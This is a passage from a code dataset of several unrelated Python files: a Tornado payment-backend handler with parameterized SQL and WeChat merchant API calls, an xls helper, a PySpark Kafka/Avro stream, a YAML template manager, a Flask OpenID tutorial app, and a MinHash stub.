uline_settle_id, trade_type,\n payment_type, payment_rate, activated_status,\n create_at, update_at)\n VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s);\"\"\"\n self.db.executeSQL(sql, (self.dt_id, payment_rate, uline_payment_id, uline_payment_code,\n uline_settle_id, trade_type,\n payment_type, payment_rate, 1, self.create_at, self.create_at))\n\n # sql = \"\"\"INSERT INTO activated_dt_info (dt_id, payment_type, comment, activated_user, activated_status, create_at)\n # values(%s, %s,%s, %s, %s, %s)\"\"\"\n # self.db.executeSQL(sql, (\n # self.dt_id, payment_type, constants.ACTIVATED_STATUS['2'],\n # self.bk_email, 2, self.create_at))\n\n # 删除支付方式\n elif action_type == 3:\n sql = \"\"\"DELETE FROM dt_payment WHERE dt_id=%s and payment_type=%s;\"\"\"\n self.db.executeSQL(sql, (self.dt_id, payment_type))\n\n # 删除旗下商户、门店的支付方式\n query = \"\"\"update mch_payment set activated_status=1 where payment_type=%s and mch_payment.mch_id in\n (select mch_id from mch_inlet_info where dt_id=%s);\"\"\"\n self.db.executeSQL(query, (payment_type, self.dt_id))\n # 删除旗下连锁商户的支付方式\n query = \"\"\"update dt_payment set activated_status=1 where payment_type=%s and dt_payment.dt_id in\n (select 
dt_id from dt_inlet_info where parent_id=%s);\"\"\"\n self.db.executeSQL(query, (payment_type, self.dt_id))\n\n raise gen.Return(payment_cut_info)\n\n @gen.coroutine\n def get_dt_wx_reg_payment(self):\n query = \"\"\"select id from dt_payment where dt_id=%s and payment_type in (1,2,3);\"\"\"\n ret = self.db.selectSQL(query, (self.dt_id,))\n raise gen.Return(ret)\n\n @gen.coroutine\n def get_dt_wx_app_payment(self):\n query = \"\"\"select id from dt_payment where dt_id=%s and payment_type=4;\"\"\"\n ret = self.db.selectSQL(query, (self.dt_id,))\n raise gen.Return(ret)\n\n @gen.coroutine\n def update_dt_user(self):\n query = \"\"\"\n update dt_user set\n status=%s,\n update_at=%s where dt_id=%s\n \"\"\"\n self.db.executeSQL(query, (self.status, self.update_at, self.dt_id))\n\n @gen.coroutine\n def auth_dt_inlet(self):\n query = \"\"\"update dt_inlet_info set\n auth_status=%s,\n update_at=%s where dt_id=%s\"\"\"\n self.db.executeSQL(query, (self.status, self.update_at, self.dt_id))\n\n @gen.coroutine\n def add_auth_inlet_info(self):\n auth_user = yield self.get_bk_email()\n query = \"\"\"\n insert into auth_dt_info (\n dt_id,\n comment,\n auth_user,\n auth_status,\n create_at)\n values (%s, %s, %s, %s, %s);\"\"\"\n self.db.executeSQL(\n query,\n (\n self.dt_id,\n AUTH_STATUS[str(self.status)],\n auth_user,\n self.status,\n self.create_at\n )\n )\n\n @gen.coroutine\n def get_bk_email(self):\n employee_id = self.session[\"employee_id\"]\n employee = uline_session.query(Employee).filter(Employee.id == employee_id).one()\n user_profile = uline_session.query(UserProfile).filter(UserProfile.id == employee.user_id).one()\n email = user_profile.email\n raise gen.Return(email)\n # query = \"\"\"select email from bk_user where bk_id=%s\"\"\"\n # ret = self.db.selectSQL(query, (self.current_user,))\n # raise gen.Return(ret[0])\n\n @gen.coroutine\n def get_dt_user_wx_id(self):\n query = \"\"\"select\n wx_sub_mch_id,\n wx_app_sub_mch_id\n from dt_user\n where dt_id=%s\"\"\"\n ret = self.db.selectSQL(query, (self.dt_id,))\n raise gen.Return(ret)\n\n @gen.coroutine\n def get_dt_inlet_info(self):\n query = \"\"\"select\n dt_name,\n contact,\n mobile,\n email,\n old_ind_code,\n wx_ind_code,\n service_phone,\n wx_channel_id,\n wx_app_channel_id,\n parent_id\n from\n dt_inlet_info\n where dt_id=%s;\"\"\"\n ret = self.db.selectSQL(query, (self.dt_id,))\n raise gen.Return(ret)\n\n @gen.coroutine\n def get_dt_wx_config(self):\n query = \"\"\"select rate from dt_user where dt_id=%s;\"\"\"\n ret = self.db.selectSQL(query, (self.dt_id,))\n if ret[0] == 1:\n raise gen.Return((WX_0_WX_MCH_ID, WX_0_WXPAY_KEY, WX_0_APPID))\n else:\n raise gen.Return((WX_MCH_ID, WXPAY_KEY, APPID))\n raise gen.Return(ret[0])\n\n @gen.coroutine\n def get_update_wx_sub_info(self):\n query = \"\"\"\n select dt_inlet_info.dt_id,\n dt_inlet_info.mobile,\n dt_user.wx_sub_mch_id,\n dt_inlet_info.service_phone\n from\n dt_inlet_info\n inner join dt_user on dt_user.dt_id=dt_inlet_info.dt_id\n where dt_inlet_info.dt_id=%s;\"\"\"\n ret = self.db.selectSQL(query, (self.dt_id,))\n raise gen.Return(ret)\n\n @gen.coroutine\n def create_wx_sub_dt_id(self, dt_inlet_info, channel_id, APPID, WX_MCH_ID, WXPAY_KEY, WX_PRIVATE_KEY, WX_PUB_KEY,\n WX_ROOT_CA):\n wx_business_no = dt_inlet_info[\n 5] if dt_inlet_info[5] else dt_inlet_info[4]\n query_args = {\n \"appid\": APPID,\n \"mch_id\": WX_MCH_ID,\n \"merchant_name\": dt_inlet_info[0],\n \"merchant_shortname\": dt_inlet_info[0],\n \"service_phone\": dt_inlet_info[6] if dt_inlet_info[6] else dt_inlet_info[2],\n 
'contact': dt_inlet_info[1],\n \"contact_phone\": dt_inlet_info[2],\n \"contact_email\": dt_inlet_info[3],\n \"business\": wx_business_no,\n \"merchant_remark\": self.dt_id,\n 'channel_id': channel_id\n }\n result = yield create_wx_mch(query_args, WXPAY_KEY, WX_PRIVATE_KEY, WX_PUB_KEY, WX_ROOT_CA)\n if not result:\n result = dict(result_code='FAIL')\n raise gen.Return(result)\n\n @gen.coroutine\n def update_wx_sub_dt_id(\n self, dt_inlet_info, APPID, WX_MCH_ID, WXPAY_KEY,\n WX_PRIVATE_KEY, WX_PUB_KEY, WX_ROOT_CA):\n mchInletToWx = UpdateMerchantInletToWx(APPID, WX_MCH_ID, WXPAY_KEY)\n\n merchant_shorname = u'{}微信支付商户'.format(BANK_NAME)\n service_phone = dt_inlet_info[3] if dt_inlet_info[3] else dt_inlet_info[1]\n data = mchInletToWx.handle()(\n merchant_shortname=merchant_shorname,\n service_phone=service_phone,\n sub_mch_id=dt_inlet_info[2],\n )\n\n is_success = True\n # 当从微信获取的商户信息不同现有信息时,才进行修改\n if self.merchant_info_in_wx and ((self.merchant_info_in_wx['merchant_shortname'] != merchant_shorname) or (\n self.merchant_info_in_wx['service_phone'] != service_phone)):\n http_client = AsyncHTTPClient()\n response = yield http_client.fetch(\n \"https://api.mch.weixin.qq.com/secapi/mch/submchmanage?action=modify\",\n method='POST', body=data,\n client_key=WX_PRIVATE_KEY,\n client_cert=WX_PUB_KEY, ca_certs=WX_ROOT_CA\n )\n ret = xml_to_dict(response.body).get('root')\n log.detail.info(response.body)\n is_success = (ret.get('return_code', '') ==\n 'SUCCESS') if ret else False\n raise gen.Return(is_success)\n elif not self.merchant_info_in_wx:\n # 如果没有从微信获取有效信息 ,应该不会发生\n log.exception.info('update_wx_sub_dt_id no merchant_info from wx')\n raise gen.Return(False)\n else:\n # 如果有信息且与现有的有效\n raise gen.Return(True)\n\n @gen.coroutine\n def add_wx_sub_dt_id(self):\n query = \"\"\"update dt_user set wx_sub_mch_id=%s,\n update_at=%s where dt_id=%s\"\"\"\n self.db.executeSQL(\n query, (self.wx_sub_dt_id, self.update_at, self.dt_id))\n\n @gen.coroutine\n def add_wx_app_sub_dt_id(self):\n query = \"\"\"update dt_user set wx_app_sub_mch_id=%s,\n update_at=%s where dt_id=%s\"\"\"\n self.db.executeSQL(query, (self.wx_app_sub_dt_id,\n self.update_at, self.dt_id))\n\n @gen.coroutine\n def save_dt_inlet_to_wx(self, ret):\n query = \"\"\"\n insert into dt_inlet_to_wx_info (\n dt_id, return_code, return_msg,\n result_code, result_msg, create_at\n ) values (%s, %s, %s, %s, %s, %s);\"\"\"\n self.db.executeSQL(\n query,\n (\n self.dt_id,\n ret.get('result_code', 'FAIL'),\n ret.get('return_msg', 'FAIL'),\n ret.get('result_code', 'FAIL'),\n ret.get('result_msg', 'FAIL'),\n self.create_at\n )\n )\n\n @gen.coroutine\n def update_app_info2wx(self):\n \"\"\"更新app商户信息到微信\n :return:\n 更新到微信,微信返回的结果,一个dict\n \"\"\"\n # 获取更新相关信息\n dt_inlet_info = yield self.get_update_wx_app_sub_info()\n service_phone = dt_inlet_info[3] if dt_inlet_info[3] else dt_inlet_info[1]\n\n merchant_name = dt_inlet_info[4]\n merchant_shorname = u'{}微信支付商户'.format(BANK_NAME)\n search_info = {\n 'merchant_name': merchant_name,\n 'sub_mch_id': dt_inlet_info[2]\n }\n self.app_merchant_info_in_wx = yield self.get_mch_info_from_wx(search_info, WX_APP_APPID, WX_APP_MCH_ID,\n WXPAY_APP_KEY, WX_APP_PRIVATE_KEY,\n WX_APP_PUB_KEY, WX_ROOT_CA)\n\n is_success = True\n # 同步至微信\n # 当从微信获取的商户信息不同现有信息时,才进行修改\n if self.app_merchant_info_in_wx and (\n (self.app_merchant_info_in_wx['merchant_shortname'] != merchant_shorname) or (\n self.app_merchant_info_in_wx['service_phone'] != service_phone)):\n updateinfo = {\n 'short_name': merchant_shorname,\n 'service_phone': 
service_phone,\n 'wx_mch_id': dt_inlet_info[2]\n }\n result = yield self.update_mch_info2wx(updateinfo, WX_APP_APPID, WX_APP_MCH_ID, WXPAY_APP_KEY,\n WX_APP_PRIVATE_KEY, WX_APP_PUB_KEY, WX_ROOT_CA)\n\n log.exception.info('update wx app mch info result:{}'.format(\n json.dumps(result, ensure_ascii=False)))\n is_success = result.get(\n 'return_code', '') == 'SUCCESS' if result else False\n if not is_success:\n log.exception.info('update wx app mch failed,result_code : {}'.format(\n result.get('return_code', '')))\n elif not self.app_merchant_info_in_wx:\n # 微信中没有商户信息,添加日志,修改失败\n log.exception.info('update_app_info2wx no merchant info from wx, app_sub_id:{0}, merchant name:{1}'.format(\n dt_inlet_info[2], merchant_shorname))\n is_success = False\n else:\n # 没有变化,表示修改成功\n is_success = True\n raise gen.Return(is_success)\n\n @gen.coroutine\n def get_update_wx_app_sub_info(self):\n query = \"\"\"\n select dt_inlet_info.dt_id,\n dt_inlet_info.mobile,\n dt_user.wx_app_sub_mch_id,\n dt_inlet_info.service_phone,\n dt_inlet_info.dt_name\n from dt_inlet_info\n inner join dt_user on dt_user.dt_id=dt_inlet_info.dt_id\n where dt_inlet_info.dt_id=%s;\"\"\"\n ret = self.db.selectSQL(query, (self.dt_id,))\n raise gen.Return(ret)\n\n @gen.coroutine\n def add_fail_auth_inlet_info(self, show_comment):\n auth_user = yield self.get_bk_email()\n query = \"\"\"\n insert into auth_dt_info (\n dt_id,\n comment,\n auth_user,\n auth_status,\n create_at)\n values (%s, %s, %s, %s, %s);\"\"\"\n self.db.executeSQL(\n query,\n (\n self.dt_id,\n show_comment,\n auth_user,\n self.status,\n self.create_at\n )\n )\n\n def latest_status(self, cursor):\n query = \"\"\"\n SELECT auth_status, auth_user\n from auth_dt_info where dt_id = %s\n order by create_at desc\n LIMIT 1;\"\"\"\n cursor.execute(query, (self.dt_id,))\n ret = cursor.fetchone()\n return ret\n\n def auth_user_email(self, bk_id):\n selSql = \"\"\"select email from bk_user where bk_id=%s\"\"\"\n db_ret = self.db.selectSQL(selSql, (bk_id,))\n if db_ret:\n return db_ret[0]\n\n def get_chain_parent_info(self, parent_id):\n query = \"\"\"SELECT wx_channel_id, wx_app_channel_id FROM dt_inlet_info where dt_id=%s\"\"\"\n result = self.db.selectSQL(query, (parent_id,))\n return result\n\n def has_authed(self):\n sql = \"\"\"select * from auth_dt_info where dt_id=%s and auth_status=2\"\"\"\n result = self.db.selectSQL(sql, (self.dt_id,), fetchone=True)\n return bool(result)\n\n def add_daily_cut_record(self, cut_record):\n sql = \"\"\"insert into daily_cut_record(role_id, role_type, record_json, status) values(%s,%s,%s,1)\"\"\"\n self.db.executeSQL(sql, (self.dt_id, 'dt', json.dumps(cut_record)))\n\n def activated_all_payment(self):\n sql = \"\"\"select payment_type from dt_payment where dt_id=%s\"\"\"\n payments_db = self.db.selectSQL(sql, (self.dt_id,), use_dict=True, fetchone=False)\n for payment in payments_db:\n payment_type = payment['payment_type']\n update_sql = \"\"\"update dt_payment set activated_status=2 where dt_id=%s and payment_type=%s\"\"\"\n self.db.executeSQL(update_sql, (self.dt_id, payment_type))\n\n sql = \"\"\"INSERT INTO activated_dt_info (dt_id, payment_type, comment, activated_user, activated_status, create_at)\n values(%s, %s,%s, %s, %s, %s)\"\"\"\n self.db.executeSQL(sql, (\n self.dt_id, payment_type, constants.ACTIVATED_STATUS['2'], self.bk_email, 2, self.create_at))\n\n def invalid_past_record(self):\n sql = \"\"\"update daily_cut_record set status=%s,update_at=%s where role_id=%s and role_type=%s and status=1\"\"\"\n self.db.executeSQL(sql, (4, 
self.create_at, self.dt_id, 'dt'))\n sql = \"\"\"update change_record set status=%s,update_at=%s where dt_id=%s and status=4\"\"\"\n self.db.executeSQL(sql, (5, self.create_at, self.dt_id))\n","sub_path":"python/uline/uline/uline/handlers/app/bank/inlet/dt_auth.py","file_name":"dt_auth.py","file_ext":"py","file_size_in_byte":49056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"65277044","text":"# xls_tool.py\n# Write matrix to a xls or Read matrix from xls\nimport xlrd\nimport xlwt\nfrom typing import List\n\n\ndef write_xls(file_name: str, matrix: List[List]):\n book_out = xlwt.Workbook()\n sheet_out = book_out.add_sheet(file_name)\n for i in range(0, len(matrix)):\n for j in range(0, len(matrix[i])):\n sheet_out.write(i, j, matrix[i][j])\n book_out.save(file_name)\n\n\ndef read_xls(file_name: str, sheet_idx=0, has_head=False, limit=(0, 0)) -> List[List]:\n book = xlrd.open_workbook(file_name)\n sheet = book.sheet_by_index(sheet_idx)\n result_mat = []\n for i in range(1 if has_head else 0, sheet.nrows if limit[0] == 0 else limit[0]):\n result_mat.append([0 if x == \"\" else x for x in sheet.row_values(i)])\n return result_mat\n\n","sub_path":"xls_tool.py","file_name":"xls_tool.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"331709450","text":"from __future__ import print_function\n\nimport avro.schema\nimport tweepy\nimport os\n\nfrom io import BytesIO\nfrom avro.datafile import DataFileReader, DataFileWriter\nfrom avro.io import DatumReader, DatumWriter, BinaryEncoder, BinaryDecoder\nfrom avro.schema import Parse\n\nfrom pyspark.sql import *\nfrom pyspark.sql.types import *\nfrom pyspark.sql.functions import col, explode\n\nos.environ['PYSPARK_SUBMIT_ARGS'] = '--packages org.apache.spark:spark-sql-kafka-0-10_2.11:2.3.0'\ndir_path = os.path.dirname(os.path.realpath(__file__))\n\ndef deserialize(flight_info_bytes) :\n if flight_info_bytes is not None:\n bytes_reader = BytesIO(flight_info_bytes)\n decoder = BinaryDecoder(bytes_reader)\n schema_flight_info = Parse(open(dir_path + \"/flight-info.schema.avsc\", \"rb\").read())\n reader = DatumReader(schema_flight_info)\n flight_info = reader.read(decoder)\n return [{\"id\": \"1\"}, {\"id\": \"2\"}]\n else:\n return None\n\ndef serialize(tweets) :\n if tweets is not None:\n schema_tweet = avro.schema.Parse(open(dir_path + \"/tweet.schema.avsc\", \"rb\").read())\n\n writer = DatumWriter()\n bytes_writer = BytesIO()\n encoder = BinaryEncoder(bytes_writer)\n writer.write_array(schema_tweet, tweets, encoder)\n tweets_bytes = bytes_writer.getvalue()\n return tweets_bytes\n else:\n return None\n\ndef initialize() :\n\n spark = SparkSession \\\n .builder \\\n .appName(\"search-flight-spark-ml-stream\") \\\n .getOrCreate()\n\n search_flight_df = spark \\\n .readStream \\\n .format(\"kafka\") \\\n .option(\"kafka.bootstrap.servers\", \"kafka.vnet:9092\") \\\n .option(\"subscribe\", \"flightInfoTopic\") \\\n .option(\"auto.offset.reset\", \"latest\") \\\n .option(\"group.id\", \"mitosis\") \\\n .load()\n\n flight_info_schema_data_type = StructType([\n StructField(\"departingId\", StringType(), False),\n StructField(\"arrivingId\", StringType(), False),\n StructField(\"tripType\", StringType(), False),\n StructField(\"departureDate\", StringType(), False),\n StructField(\"arrivalDate\", StringType(), False),\n StructField(\"passengerNumber\", IntegerType(), False),\n StructField(\"cabinClass\", 
StringType(), False),\n ])\n\n tweet_schema_data_type = StructType([\n StructField(\"id\", StringType(), False)\n ])\n\n spark.udf.register(\"deserialize\", deserialize, flight_info_schema_data_type)\n spark.udf.register(\"serialize\", serialize)\n\n search_flight_ds = search_flight_df\\\n .selectExpr(\"key\", \"deserialize(value) as tweets\")\\\n .selectExpr(\"key\", \"serialize(tweets) as value\")\\\n .selectExpr(\"CAST(key AS STRING)\", \"CAST(value AS BINARY)\")\n\n search_flight_ds \\\n .writeStream \\\n .format(\"kafka\") \\\n .option(\"kafka.bootstrap.servers\", \"kafka.vnet:9092\") \\\n .option(\"topic\", \"tweetsTopic\") \\\n .option(\"group.id\", \"mitosis\") \\\n .option(\"checkpointLocation\", \"/tmp/checkpoint\") \\\n .start() \\\n .awaitTermination()\n\n spark.stop()\n\nif __name__ == \"__main__\":\n initialize()\n","sub_path":"ml/spark/stream.py","file_name":"stream.py","file_ext":"py","file_size_in_byte":3120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"423456938","text":"import json\nimport re\nimport jsonschema\nimport base64\nimport uuid\nimport time\nimport os\nimport yaml\n\n\nclass TemplateManager():\n \"\"\"\n A package that makes it easy to process templates made of YAML files, Kubernetes-style, handling each template differently according to its kind.\n \"\"\"\n\n def __init__(self, templates_dir):\n \"\"\"\n Parameters\n ----------\n\n * `(required) templates_dir`: str\n\n Path to the folder that contains the templates.\n\n \"\"\"\n\n self._template_schema = self._get_template_schema()\n\n self._kinds = {}\n self._templates = {}\n\n for path in self._find_all_by_name(templates_dir, r\".+\\.yaml\"):\n self._load_template(path, update=False)\n\n def register(self, kind, worker, options={}, template_schema={}, process_schema={}):\n \"\"\"\n Used to register how a given template kind should be processed.\n\n Parameters\n ----------\n\n * `(required) kind`: str\n\n The name of the template kind.\n\n * `(required) worker`: function\n\n The function that processes this kind. It must accept the parameters `spec` and `args`.\n\n * `spec`: spec key in YAML\n * `args`: the arguments sent by the user\n\n ```\n def worker(spec, args):\n ...\n ```\n\n * `template_schema`: dict\n\n The schema used for the template. See [here](#how_to_use_schmea) for details.\n\n ```json\n {\n \"plus\": {\n \"schema\": {\n \"type\": \"object\",\n \"properties\": {\n \"number_a\": {},\n \"number_b\": {}\n },\n \"required\": [\n \"number_a\", \"number_b\"\n ]\n }\n }\n }\n ```\n\n * `process_schema`: dict\n\n The schema used by the process function. See [here](#how_to_use_schmea) for details.\n\n ```json\n {\n \"first_word_getter\": {\n \"schema\": {\n \"type\": \"object\",\n \"properties\": {\n \"sentence\": {}\n }\n },\n \"properties\": {\n \"sentence\": {\n \"default\": \"Hello World\"\n }\n }\n }\n } \n ```\n\n * `(deprecated) options`: dict\n\n An option that was deprecated when the package was slimmed down.\n\n\n Returns\n -------\n\n Always returns True if no error occurs. 
\n \"\"\"\n\n self._kinds[kind] = {\n \"kind\": kind,\n \"worker\": worker,\n \"options\": options,\n \"template_schema\": template_schema,\n \"process_schema\": process_schema\n }\n\n return True\n\n def get(self, name):\n \"\"\"\n 템플릿의 정보를 가져올 때 사용합니다.\n\n **Parameters**\n\n * `(required) name`: str\n\n 템플릿의 이름입니다.\n\n **Returns**\n\n `템플릿 정보`: dict \n \"\"\"\n self._validate_template(name)\n return self._templates[name]\n\n def find(self, kind=\"\", category=None, tags=[], meta={}):\n \"\"\"\n 템플릿들을 찾을 때 사용합니다.\n\n **Parameters**\n\n * `kind`: str\n\n kind 로 템플릿들을 찾습니다.\n\n ```python\n \"plus\"\n ```\n\n * `category`: str\n\n category 로 템플릿들을 찾습니다.\n\n ```python\n \"fruit\"\n ```\n\n * `tags`: list\n\n tags 로 템플릿들을 찾습니다.\n\n 요청한 태그들이 모두 매치되어야 합니다.\n\n ```json\n [\"apple\", \"banana\"]\n ```\n\n * `meta`: dict\n\n meta 로 템플릿들을 찾습니다.\n\n tags 가 배열이라면 meta 는 dict 형식입니다.\n\n ```json\n {\n \"fruit\": \"apple\"\n }\n ```\n\n **Returns**\n\n `template name list`: list\n \"\"\"\n result = []\n\n for name in self._templates:\n\n piece = self.get(name)\n\n if kind != \"\":\n if kind != piece[\"kind\"]:\n continue\n\n if isinstance(category, str):\n if category != piece[\"category\"]:\n continue\n\n if len(meta) != 0:\n if not self._is_obj_looking_for(piece[\"meta\"], meta):\n continue\n\n if len(tags) != 0:\n if not self._is_array_looking_for(piece[\"tags\"], tags):\n continue\n\n result.append(name)\n\n return result\n\n def get_spec(self, name):\n self._validate_template(name)\n return self.get(name)[\"origin\"][\"spec\"]\n\n def get_kind(self, name):\n self._validate_template(name)\n\n return self.get(name)[\"origin\"][\"kind\"]\n\n def process(self, name, args={}):\n \"\"\"\n Register 에서 등록한 방식대로 템플릿을 처리 할 때 사용합니다.\n\n **Parameters**\n\n * `(required) name`: str\n\n 템플릿의 이름입니다.\n\n * `(required) args`: dict\n\n Worker 에게 보낼 매개변수입니다.\n\n **Returns**\n\n `Wokrer 가 처리한 결과`\n \"\"\"\n\n self._update_template(name)\n\n if \"process_schema\" in args and args[\"process_schema\"] != {}:\n args = self._get_validated_obj(args, args[\"process_schema\"])\n\n kind_info = self._kinds[self.get(name)[\"kind\"]]\n worker = kind_info[\"worker\"]\n\n if not worker:\n raise ValueError(f\"{name}'s worker is not exsists.\")\n\n return worker(self.get(name)[\"origin\"][\"spec\"], args)\n\n def _update_template(self, name):\n self._validate_template(name)\n\n return self._load_template(self.get(name)[\"path\"], update=True)\n\n def _load_template(self, path, update):\n with open(path, \"r\", encoding=\"utf-8\") as fp:\n\n loaded_template = yaml.full_load_all(fp.read())\n\n for index, raw_template in enumerate(loaded_template):\n\n self._get_validated_obj(\n raw_template, self._template_schema)\n\n kind = raw_template[\"kind\"]\n name = raw_template[\"name\"]\n meta = raw_template[\"meta\"]\n raw_template[\"spec\"] = raw_template.get(\"spec\", {})\n random_name = False\n\n if name == \"random\":\n name = base64.b64encode(\n (path + str(index)).encode()).decode()\n random_name = True\n\n category = raw_template[\"category\"]\n tags = raw_template[\"tags\"]\n\n if name in self._templates and update == False:\n raise ValueError(f\"name already exists. name is {name}\")\n\n if kind == \"\":\n raise ValueError(\"kind is empty.\")\n\n if name == \"\":\n raise ValueError(\"name is empty.\")\n\n if category == \"\":\n raise ValueError(\"category is empty.\")\n\n if not isinstance(meta, dict):\n raise ValueError(f\"meta is not a dict. 
meta is {meta}\")\n\n # spec validate\n if \"template_schema\" in raw_template and raw_template[\"template_schema\"] != {}:\n raw_template[\"spec\"] = self._get_validated_obj(\n raw_template[\"spec\"], raw_template[\"template_schema\"])\n\n self._templates[name] = {\n \"kind\": kind,\n \"name\": name,\n \"category\": category,\n \"tags\": tags,\n \"origin\": raw_template,\n \"path\": path,\n \"meta\": meta,\n \"random_name\": random_name\n }\n\n def _validate_template(self, name):\n if name not in self._templates:\n raise ValueError(\n \"name is not exists in templates. name is [%s]\" % name)\n\n def _get_validated_obj(self, obj, schema_item):\n\n schema = schema_item.get(\"schema\", {})\n properties = schema_item.get(\"properties\", {})\n\n for name in properties:\n prop = properties[name]\n\n for key in prop:\n if key == \"default\":\n default = prop[key]\n if name not in obj:\n obj[name] = default\n\n for key in prop:\n value = obj[name]\n if key == \"change_type\":\n type_name = prop[key]\n obj[name] = self._set_type(type_name, value)\n try:\n jsonschema.validate(obj, schema)\n except Exception as e:\n raise ValueError(f\"validate failed. {e}\")\n\n return obj\n\n def _is_obj_looking_for(self, obj: dict, user_obj: dict):\n\n o = obj.copy()\n uo = user_obj.copy()\n\n o.update(uo)\n\n if o == obj:\n return True\n\n return False\n\n def _is_array_looking_for(self, array: list, user_array: list):\n\n a = array.copy()\n ua = user_array.copy()\n\n a += ua\n\n if set(a) == set(array):\n return True\n\n return False\n\n def _find_all_by_name(self, start_dir, regex):\n finded_files = []\n compiled_regex = re.compile(regex)\n\n for root, _, files in os.walk(start_dir):\n for filename in files:\n if compiled_regex.findall(filename):\n finded_files.append(os.path.join(\n root, filename).replace(\"\\\\\", \"/\"))\n\n return finded_files\n\n def _set_type(self, type_name, value):\n\n if type_name == \"int\":\n return int(value)\n elif type_name == \"float\":\n return float(value)\n elif type_name == \"string\":\n return str(value)\n elif type_name == \"bool\":\n if value == \"true\" or value == \"True\":\n return True\n elif value == \"false\" or value == \"False\":\n return False\n else:\n raise ValueError(f\"invalid bool value. value is [{value}]\")\n else:\n raise ValueError(\"invalid set type name %s\" % (type_name))\n\n def _get_template_schema(self):\n return {\n \"properties\": {\n \"name\": {\n \"default\": \"random\"\n },\n \"category\": {\n \"default\": \"default\"\n },\n \"tags\": {\n \"default\": []\n },\n \"spec\": {\n \"default\": {}\n },\n \"meta\": {\n \"default\": {}\n }\n },\n \"schema\": {\n \"type\": \"object\",\n \"properties\": {\n \"kind\": {},\n \"name\": {},\n \"category\": {},\n \"tags\": {\n \"type\": \"array\"\n },\n \"spec\": {\n \"type\": \"object\"\n },\n \"meta\": {\n \"type\": \"object\"\n }\n },\n \"required\": [\n \"kind\"\n ]\n }\n }\n","sub_path":"template_manager/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":11865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"163505375","text":"from flask import render_template, flash, redirect, session, url_for, request, g\nfrom flask.ext.login import login_user, logout_user, current_user, login_required\n\n#from app the package import app the variable, i think\nfrom app import app, db, lm, oid\n\n#not sure what the . 
\nfrom .forms import LoginForm, EditForm\nfrom .models import User\n\nfrom datetime import datetime\n\n@lm.user_loader\ndef load_user(id):\n return User.query.get(int(id))\n\n@app.route('/')\n@app.route('/index')\n@login_required\ndef index():\n user = g.user\n posts = [ #fake array of posts\n {\n 'author': {'nickname': 'John'},\n 'body': 'A beautiful day in PDX'\n },\n {\n 'author': {'nickname': 'Susan'},\n 'body': \"The avengers was so cool!\"\n }\n ]\n return render_template('index.html',\n title='Home',\n user=user,\n posts=posts)\n\n@app.route('/login', methods=['GET', 'POST'])\n@oid.loginhandler #tells Flask-OpenID that this is our login view function\ndef login():\n if g.user is not None and g.user.is_authenticated: #g is global\n return redirect(url_for('index'))\n form = LoginForm()\n #validates as False when there is no data, so the form will be rendered\n #if it validates successfully, redirect\n #if it doesn't validate, render the form again\n if form.validate_on_submit():\n #store boolean in flask session\n session['remember_me'] = form.remember_me.data\n return oid.try_login(form.openid.data, ask_for=['nickname', 'email'])\n return render_template(\n 'login.html',\n title='Sign In',\n form=form,\n providers=app.config['OPENID_PROVIDERS']\n )\n\n#resp arg contains information returned by the OpenID provider\n\n@oid.after_login\ndef after_login(resp):\n #require an email to login\n if resp.email is None or resp.email == \"\":\n flash('Invalid login. Try again.')\n return redirect(url_for('login'))\n #search db for the email provided\n #if not found, this is a new user, add to DB\n user = User.query.filter_by(email=resp.email).first()\n if user is None:\n nickname = resp.nickname\n if nickname is None or nickname == \"\":\n nickname = resp.email.split('@')[0]\n user = User(nickname=nickname, email=resp.email)\n db.session.add(user)\n db.session.commit()\n remember_me = False\n if 'remember_me' in session:\n remember_me = session['remember_me']\n session.pop('remember_me', None)\n login_user(user, remember = remember_me)\n return redirect(request.args.get('next') or url_for('index'))\n\n\n#Any functions that are decorated with before_request will run before the view function each time a request is received.\n@app.before_request\ndef before_request():\n #takes the current user set by Flask-Login and puts it into the global g\n g.user = current_user\n\n@app.route('/logout')\ndef logout():\n logout_user()\n return redirect(url_for('index'))\n\n#the argument in the route decorator is passed to the view function\n@app.route('/user/<nickname>')\n@login_required\ndef user(nickname):\n user = User.query.filter_by(nickname=nickname).first()\n if user is None:\n flash('User {} not found'.format(nickname))\n return redirect(url_for('index'))\n posts = [\n {'author': user, 'body': 'Test post #1'},\n {'author': user, 'body': 'Test post #2'}\n ]\n return render_template('user.html', user=user, posts=posts)\n\n@app.route('/edit', methods=['GET', 'POST'])\n@login_required\ndef edit():\n form = EditForm()\n if form.validate_on_submit():\n g.user.nickname = form.nickname.data\n g.user.about_me = form.about_me.data\n db.session.add(g.user)\n db.session.commit()\n flash(\"Your changes have been saved\")\n return redirect(url_for('edit'))\n else:\n form.nickname.data = g.user.nickname\n form.about_me.data = g.user.about_me\n return render_template('edit.html', form=form)\n\n@app.errorhandler(404)\ndef not_found_error(error):\n return render_template('404.html'), 404\n\n@app.errorhandler(500)\ndef 
internal_error(error):\n db.session.rollback()\n return render_template('500.html'), 500\n","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"465127467","text":"# MinHashing : A class MinHashing that builds a minHash signature (in the form of \n# a vector or a set) of a given length n from a given set of integers (a set of hashed shingles).\n\nimport random\n\nclass MinHashing(object):\n def __init__(self):\n super(MinHashing, self).__init__()\n\n def next_prime(n):\n a = n\n b = 2*n\n\n for p in range(a, b):\n for i in range(2, p):\n if p % i == 0:\n break\n else:\n return p\n return None\n\n def random_coeff(k, max_value):\n rand_list = []\n while k > 0:\n rand_ix = random.randint(1, max_value) \n while rand_ix in rand_list:\n rand_ix = random.randint(1, max_value) \n rand_list.append(rand_ix)\n k = k - 1 \n return rand_list\n\n\n\n\n\n\n\n","sub_path":"finding_similar_items/min_hashing.py","file_name":"min_hashing.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"550078486","text":"import pandas as pd\nfrom matplotlib import pyplot as plt\n\nx = [1,2,3]\ny = [1,4,9]\n\n# plt.plot(x, y)\n# plt.title('whatever')\n# 